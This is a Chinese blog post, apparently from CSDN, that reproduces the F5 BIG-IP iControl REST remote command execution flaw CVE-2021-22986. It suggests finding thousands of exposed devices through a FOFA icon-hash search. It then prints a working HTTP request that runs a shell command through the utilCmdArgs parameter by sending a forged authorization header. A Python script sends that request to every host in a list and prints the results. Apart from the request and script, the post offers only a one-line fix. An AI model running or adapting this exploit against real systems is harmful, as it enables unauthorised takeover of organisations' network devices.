F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986

最新推荐文章于 2023-02-03 18:13:53 发布
最新推荐文章于 2023-02-03 18:13:53 发布
阅读量846 收藏 2
点赞数 1
分类专栏: web渗透 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sun_k/article/details/115219497
版权

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

一:漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台,,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。

二: 漏洞影响

F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2

三: 漏洞复现

通过fofa(会员才能使用该搜索方法)语句搜索icon_hash:-335242539(下篇文章来写通过icon_hash来定位真实的IP地址),搜索出将近7000条,fofa还是很强大的。在这里插入图片描述
随便访问一个url,登陆页面如下:
在这里插入图片描述
poc如下:该漏洞通过utilCmdArgs参数执行命令。

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

响应包为:
在这里插入图片描述
四: 漏洞批量检测POC,将ip.txt放入同级目录即可。

import requests
import sys
import random
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def poc():
    with open(r"ip.txt", "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "https://" + url
            url = url.strip('\n')
            vun_url=url + "/mgmt/tm/util/bash"
            headers={
                        "Authorization": "Basic YWRtaW46QVNhc1M=",
                        "X-F5-Auth-Token": "",
                        "Content-Type": "application/json"
                    }
            data='{"command":"run","utilCmdArgs":"-c id"}'
            try:
                requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
                response=requests.post(url=vun_url,headers=headers,data=data,verify=False,timeout=2)
                if "commandResult" in response.text and response.status_code ==200:
                    print("目标{}存在漏洞,响应为{}".format(url,json.loads(response.text)["commandResult"]))
                else:
                    print("目标{}不存在漏洞".format(url))
            except Exception as e:
                print("目标{}请求失败".format(url))

    
if __name__ == '__main__':
    poc()

检测效果如下:
在这里插入图片描述

五: 修复方法:

官方已发布上述漏洞的安全更新,建议受影响用户尽快升级到安全版本。

参考连接:
https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ
https://mp.weixin.qq.com/s/lyrVwgSnu0iSehVr3lZiRw
https://mp.weixin.qq.com/s/NFNdr_0_6G0Zd65BvfNA-w

Justsudo
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)
nnn2188185的博客
05-06 570
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞
java读取远程文件_F5 BIGIP 远程命令执行漏洞(CVE20205902)
weixin_42366954的博客
12-26 724
一、F5BIG-IP简介F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。二、漏洞简介近日,F5 BIG-IP被爆出存在远程命令执行漏洞(CVE-2020-5902),攻击者可在未授权的情况下远程执行命令、创建或删除文件、开启或关闭服务等。此漏洞为2017年Fastjson1.2.24 版本反序列化漏洞的延伸利用。攻击者可以通过发送精...
F5 BIG-IP 高危漏洞可导致拒绝服务和代码执行
smellycat000的专栏
02-03 1454
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士F5 提醒称,BIG-IP 中存在一个高危格式化字符串漏洞 (CVE-2023-22374),可导致认证攻击者触发拒绝服务条件并可能执行任意代码。该漏洞影响一个公开的API即 iControl SOAP,该API用于赋能系统间的通信。SOAP接口可通过BIG-IP管理端口和/或自己的IP地址从网络访问,且仅限于管理员账户。发现该漏洞的Rapid ...
[应用漏洞]F5 BIG-IP远程代码执行漏洞CVE-2020-5902)
不忘初心,护天下安全!
07-09 1289
一、漏洞介绍 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。PositiveTechnologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。 二、涉及.
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)
whojoe的博客
07-06 5809
F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)前言漏洞详情影响版本修复建议环境搭建漏洞复现参考文章 前言 漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-202122986-EXP:F5 BIG-IP远程代码执行cve-2021-22986,批量检测;命令执行利用
04-01
F5 BIG-IP远程命令执行突破(CVE-2021-22986) 进攻影响 F5 BIG-IP 16.x:16.1.0.3 F5 BIG-IP 15.x:15.1.0.4 F5 BIG-IP 14.x:14.1.2.6 F5 BIG-IP 13.x:13.1.3.4 F5 BIG-IP 12.x:12.1.5.2 F5 BIG-IP 11.x:...
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE
03-25
漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
F5 最新CVE漏洞说明:BIG-IP 和 BIG-IQ 的新漏洞和更新
f5networks的博客
11-04 1298
作为安全漏洞持续管理的一部分,F5 在8月24日发布了 BIG-IP 和 BIG-IQ 的新漏洞和更新。对漏洞及时披露和有效补救是我们安全实践的核心诉求,这反映了我们保持警惕并专注于不断改进的不懈努力。
CVE-2020-5902)漏洞复现|我们能从F5 BIG-IP 远程代码执行漏洞学到什么?
siaowei44的博客
07-10 773
(一)漏洞简介 上周爆出一个严重的漏洞漏洞编号为CVE-2020-5902。这个漏洞存在于F5公司的Big-IP设备。 BIG-IP 广泛应用于大型企业,数据中心、云计算平台中,可以实现应用加速、负载均衡、SLL过载、web应用防火墙等功能。 简而言之,通过在Big-IP的TMUI(用户管理页面)发送特定的请求包,就可以在管理员权限下读取文件、写入文件并执行bash命令。 经过了解,该产品应用广泛,然而该漏洞复现简单,可以说影响颇大,建议存在该漏洞Big-IP版本尽快修复。 (二)影响版...
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
include_voidmain的博客
06-15 2213
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
gitlab-runner 执行权限不够_F5 BIG-IP 远程代码执行漏洞CVE-2020-5902) 漏洞利用
weixin_35327824的博客
12-26 390
0x01 漏洞详情最近各大平台都在推送F5 BIG-IP 远程代码执行漏洞漏洞编号为CVE-2020-5902。BIG-IP ADC广泛应用于大型企业,数据中心、云计算平台中,可以实现应用加速、负载均衡、SLL过载、web应用防火墙等功能。未认证的攻击者可以通过发送伪造的恶意HTTP请求到含有TMUI工具的具有漏洞的服务器来远程利用该漏洞。成功利用该漏洞可以完全控制设备的管理员权限,无需授权就可...
F5 BIG-IP iControl REST未授权命令注入RCE(CVE-2021-22986)
xiaobai_20190815的博客
05-17 942
一、漏洞描述 F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。 二、影响版本 F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现
qq_37200100的博客
06-16 1935
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现 一、在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择15.1.0长期维护版本 在这里,我们选择虚拟化版本 点击我接受按钮 选择第一个下载 下载完成之后,我们将下载下来的ova文件拖动到虚拟机当中,即可完成虚拟机的安装 二、BIGIP虚拟机的初始使用 虚拟机登陆 虚拟机
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
m0_46377671的博客
05-18 4549
漏洞概述 2022年5月6日,F5官方发布了BIG-IP iControl REST的风险通告,漏洞编号为CVE-2022-1388,漏洞等级为严重。F5 BIG-IP是美国F5公司的一款集成了网络流量、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST是iControl框架的演变,使用REpresentational State Transfer。这允许用户或脚本与设备之间进行轻量级、快速的交互。 组件:F5 BIG-IP iControl REST 漏洞类型:身份验证绕过 影响:
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
「鸿渐之翼」的博客
04-29 2384
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) * reverse shell tcp (1907) port shellcode C language - Linux/x86_64 Author : Kağan Çapar contact:
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)
thelostworld
03-20 3578
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986) 一、简介 该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 ​ 二、影响版本 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x:..
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值